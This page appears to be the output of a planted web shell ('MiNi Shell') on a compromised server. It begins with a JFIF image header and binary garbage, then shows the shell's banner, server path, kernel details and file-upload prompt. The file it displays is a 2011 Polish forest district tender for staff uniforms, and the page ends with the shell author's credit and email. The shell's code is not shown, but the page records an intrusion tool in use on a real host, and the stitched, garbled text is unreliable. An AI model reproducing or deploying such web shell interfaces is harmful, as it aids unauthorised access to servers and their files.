JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111230/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111230/445520-N-2011.html

<p class="kh_header"><b>Rudka: Dostawa sortów mundurowych dla pracowników ALP w 2012 roku</b><br>
<b>Numer ogłoszenia: 445520 - 2011; data zamieszczenia: 30.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Rudka , ul. Olendzka 31, 17-123 Rudka, woj. podlaskie, tel. 85 7305800, faks 85 7394265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> : http://www.bialystok.lasy.gov.pl/rudka</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sortów mundurowych dla pracowników ALP w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Dostawa sortów mundurowych dla pracowników ALP w 2012 roku. wykonanych według wzorów określonych:
1.1. Rozporządzeniem Ministra Ochrony Środowiska z dnia 12 marca 2007r. w sprawie wzoru mundurów leśnika i oznak dla osób uprawnionych do ich noszenia (Dz.U.Nr 51 poz.342 z 2007r.),
1.2. Zarządzeniem Nr 57 Dyrektora Generalnego Lasów Państwowych z dnia 31 maja 1999 r. w sprawie wprowadzenia wzorcowych mundurów leśnika, przedmiotów uzupełniających do mundurów leśnika oraz oznak dla osób uprawnionych do ich noszenia (http://www.lasy.gov.pl/dokumenty/zarzadzenia-decyzje),
1.3. Zarządzeniem Nr 68 Dyrektora Generalnego Lasów Państwowych z dnia 20 lipca 2001r. w sprawie określenia rodzajów tkanin, jakie mogą być używane do szycia mundurów leśnika (http://www.lasy.gov.pl/dokumenty/zarzadzenia-decyzje),
1.4. Zarządzeniem nr 16 Dyrektora Generalnego Lasów Państwowych z dnia 14 marca 2005r. w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnika (http://www.lasy.gov.pl/dokumenty/zarzadzenia-decyzje)
Łączną ilość zamówienia w rozbiciu na poszczególne elementy umundurowania zawiera poniższy wykaz:
Mundur wyjściowy:	
Płaszcz	-  1,
Marynarka zimowa	- 4,
Marynarka letnia	- 1,
Spodnie letnie	- 17,
Spódnica letnia	- 1,
Spodnie zimowe	- 18,
Koszula biała z krótkim rękawem 	- 17,
Koszula biała z długim rękawem	- 20,
Krawat	- 6, 
Kurtka zimowa	- 3,
Czapka wyjściowa	-1,
Kapelusz	- 5,
Szalik	-2,
Rękawice	- 12,
Skarpety letnie	- 34,
Skarpety zimowe	- 21,
Półbuty wyjściowe	- 9,
Mundur codzienny:	
Koszula zielona z krótkim rękawem	- 21,
Koszula zielona z długim rękawem	- 21,
Sweter	-  24,
Kamizelka	- 23,
Bluza z polaru	- 37,
Kurtka codzienna	- 25,
Czapka codzienna	- 1,
Czapka zimowa codzienna	- 6,
Półbuty codzienne na grubej zelówce	- 56,
Trzewiki z membraną SYMPATEX	- 37,
Trzewiki z membraną GORETEX	- 19,
Mundur terenowy:	
Bluza panterka letnia	- 3,
Spodnie panterka letnie	- 25,
Czapka panterka letnia	- 11,
Bluza panterka zimowa	- 6,
Spodnie panterka zimowe	- 8,
Czapka panterka zimowa	- 5,
Dodatki:	
Oznaki służbowe	- 1
2.  Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień:
18100000-0	- Odzież branżowa, dodatki
18800000-7	- Obuwie
3.	Szczegółowy opis przedmiotu zamówienia zawiera (Załącznik nr 1 do SIZW)
4.	Wykonawca zapewni Zamawiającemu 24 miesięczną gwarancję na wykonane dostawy.
5.	Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu zobowiązany jest wykazać, iż elementy umundurowania będące przedmiotem dostawy są zgodne z zapisami techniczno-technologicznej dokumentacji stanowiącej opis przedmiotu zamówienia, przedstawiając Zamawiającemu kopie ważnego, wydanego przez Ośrodek Rozwojowo-Wdrożeniowy Lasów Państwowych w Bedoniu Nowy Bedoń, ul. Sienkiewicza 19, 95-020 Andrespol na producenta wskazanego w ofercie, świadectwa zgodności elementów munduru będących przedmiotem dostawy ze wzorcem munduru leśnika zatwierdzonym przez Dyrektora Generalnego Lasów Państwowych Zarządzeniem Nr 57 z dnia 31 maja 1999 r. w sprawie wprowadzenia wzorcowych mundurów leśnika, przedmiotów uzupełniających do mundurów leśnika oraz oznak dla osób uprawnionych do ich noszenia. Kopia świadectwa winna być złożona Zamawiającemu przez Wykonawcę najpóźniej wraz z pierwszą dostawą elementów munduru.
6.	W przypadku, gdy wraz z dostawą nie zostaną złożone Zamawiającemu w/w świadectwa zgodności, Zamawiający uprawniony jest do odmowy odbioru dostawy i odstąpienia od umowy na dostawę sortów mundurowych łączącej go z Wykonawcą w terminie 30 dni, od dnia kiedy Zamawiający powziął wiadomość o okolicznościach uzasadniających odstąpienie od umowy z w/w przyczyny. 
7.	Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu zobowiązany jest do dostarczenia Zamawiającemu wyrobów wykonanych zgodnie z wzorem, który był przedstawiony Ośrodkowi Rozwojowo-Wdrożeniowemu Lasów Państwowych w Bedoniu do oceny zgodności wyrobu z dokumentacją techniczno-technologiczną, pod rygorem odmowy odbioru dostawy i odstąpienia przez Zamawiającego od umowy na dostawę sortów mundurowych łączącej go z Wykonawcą w terminie 30 dni, od dnia kiedy Zamawiający powziął wiadomość o okolicznościach uzasadniających odstąpienie od umowy z w/w przyczyny.    
8.	Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu zobowiązany jest do prowadzenia w trakcie obowiązywania umowy punktu wydawania sortów mundurowych w odległości nie większej niż 10 km od siedziby Zamawiającego lub w Białymstoku, czynnego w dni robocze od poniedziałku do piątku w godz. od 9oo do 15oo oraz co najmniej w pierwszą i ostatnią sobotę każdego miesiąca w godz. od 9oo do 15oo , gwarantującego możliwość przymiarki i odbioru elementów umundurowania upoważnionym  pracownikom Zamawiającego. Wykonawca zobowiązany jest do pisemnego (pod rygorem nieważności) poinformowania Zamawiającego, w terminie 14 dni od podpisania umowy, o adresie w/w punktu wydawania sortów mundurowych. W przypadku niewywiązania się przez Wykonawcę z powyższych obowiązków, Zamawiający uprawniony jest do odstąpienia od umowy na dostawę sortów mundurowych łączącej go z Wykonawcą w terminie 30 dni, od dnia kiedy Zamawiający powziął wiadomość o okolicznościach uzasadniających odstąpienie od umowy z w/w przyczyny. 
9.	Zamawiającemu oraz upoważnionym przez niego pracownikom przysługuje prawo do odbioru przedmiotu dostawy bezpośrednio w w/w punkcie wydawania sortów mundurowych.
10.Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu zobowiązany jest przynajmniej dwa razy w trakcie obowiązywania umowy do dostarczenia uzgodnionej wcześniej z Zamawiającym ilości i rodzaju sortów do siedziby Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.80.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykonania przedmiotu zamówienia nie jest wymagane posiadanie określonych uprawnień. W związku z powyższym Zamawiający nie opisuje i nie wyznacza warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy posiadają wiedzę i doświadczenie, tj. Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, co najmniej trzy dostawy odpowiadające swoim rodzajem (dostawa umundurowania do jednostek Lasów Państwowych, wojska, policji, straży pożarnych lub innych służb mundurowych) dostawie stanowiącej przedmiot zamówienia, o wartości nie mniejszej niż 70.000,00 zł brutto każda. Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia, na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy dysponują odpowiednim potencjałem technicznym. Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia, na podstawie oświadczenia przedstawionego przez Wykonawcę potwierdzającego spełnienie warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia. Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia, na podstawie oświadczenia przedstawionego przez Wykonawcę potwierdzającego spełnienie warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia, na podstawie oświadczenia przedstawionego przez Wykonawcę potwierdzającego spełnienie warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.    W przypadku złożenia oferty przez podmioty występujące wspólnie:
1.1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz załączają do oferty pełnomocnictwo. Wypełniając formularz ofertowy, jak również inne dokumenty jako nazwę i adres Wykonawcy należy wpisać dane dotyczące konsorcjum, a nie pełnomocnika (uwaga: po zawarciu umowy wszelka korespondencja oraz rozliczenia będą dokonywane wyłącznie z pełnomocnikiem).
1.2. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.
1.3. W przypadku złożenia oferty przez podmioty występujące wspólnie Zamawiający dopuszcza następujący sposób spełnienia warunków udziału w postępowaniu:
1.3.1.  w odniesieniu do wymogu dot. posiadania wiedzy i doświadczenia - co najmniej jeden z Wykonawców musi spełniać wymagane warunki,
1.3.2. w odniesieniu do wymogu dot. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - łączny potencjał Wykonawców,
1.3.3.  w odniesieniu do wymogu dot. sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - łączna sytuacja ekonomiczna i finansowa Wykonawców.
1.4.	Każdy z wykonawców ubiegający się wspólnie o udzielenie zamówienia ma obowiązek dołączyć do składanej oferty dokumenty wymagane w rozdz. VIII pkt. l SIWZ  albo w rozdziale VIII pkt 3 SIWZ w przypadku wykonawców wskazanych w rozdziale VIII pkt 3 SIWZ.
1.5.	Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana Zamawiający będzie żądał przed zawarciem umowy w sprawie niniejszego zamówienia, umowy regulującej współpracę tych Wykonawców.
2.   Inne dokumenty, które Wykonawca zobowiązany jest złożyć w niniejszym postępowaniu:
2.1. Wypełniony formularz ofertowy - (Załącznik nr 2 do SIWZ).
2.2.  Wypełniony formularz cenowy - (Załącznik nr 3 do SIWZ).
2.3.  W przypadku, gdy Wykonawca zamierza korzystać z podwykonawcy zobowiązany jest wypełnić zgodny w treści z załączonym do SIWZ wzorem - (Załącznik nr 7 do SIWZ), przedstawiając zakres powierzonych podwykonawcy części zamówienia.
2.4.  Wykonawca polegający na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia - (Załącznik nr 9 do SIWZ). 
3. Dokumenty potwierdzające spełnienie warunków udziału w niniejszym postępowaniu oraz wykazujące brak podstaw do wykluczenia, o których mowa w art. 24 ust. 1 ustawy mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w rozdziale VIII pkt 5 ppkt 5.4. SIWZ, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane 
za zgodność z oryginałem przez wykonawcę lub te podmioty, za wyjątkiem pisemnego zobowiązania, o którym mowa w rozdz. VIII pkt 5. ppkt 5.4 SIWZ  oraz oświadczenia o którym mowa w rozdziale VIII pkt 2 ppkt 2.2 SIWZ, które należy złożyć w oryginale.
4. Z załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, że Wykonawca spełnia wszystkie warunki udziału w postępowaniu określone w rozdziale VII SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Stosownie do treści art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych strony dopuszczają możliwość redukcji zamówienia do wysokości 80 % wartości zamówienia (wartości umowy), w przypadku zmniejszenia się ilości pracowników uprawnionych do otrzymania sortów mundurowych, zmiany przepisów dotyczących sortów, pogorszenia się sytuacji ekonomicznej Zamawiającego. 
2.	W przypadku, o którym mowa w ust. 1 Wykonawca może żądać wyłącznie wynagrodzenia należnego za rzeczywiście wykonaną część umowy.
3.  Należne Wykonawcy wynagrodzenie zostanie obliczone proporcjonalnie do zmniejszenia ilości rzeczywiście odebranych elementów sortów mundurowych, przy przyjęciu stawek jednostkowych z formularza cenowego oferty złożonego przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/editor-mode/pl/bip/dg/rdlp_bialystok/nadl_rudka/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Rudka, ul. Olendzka 31; 17-123 Rudka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2012 godzina 09:00, miejsce: Oferty należy składać w sekretariacie Zamawiającego w biurze Nadleśnictwa Rudka,   17-123 Rudka ul. Olendzka 31 pokój nr. 6.(sekretariat- jest czynny od poniedziałku do piątku w godz. 730 - 1530).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com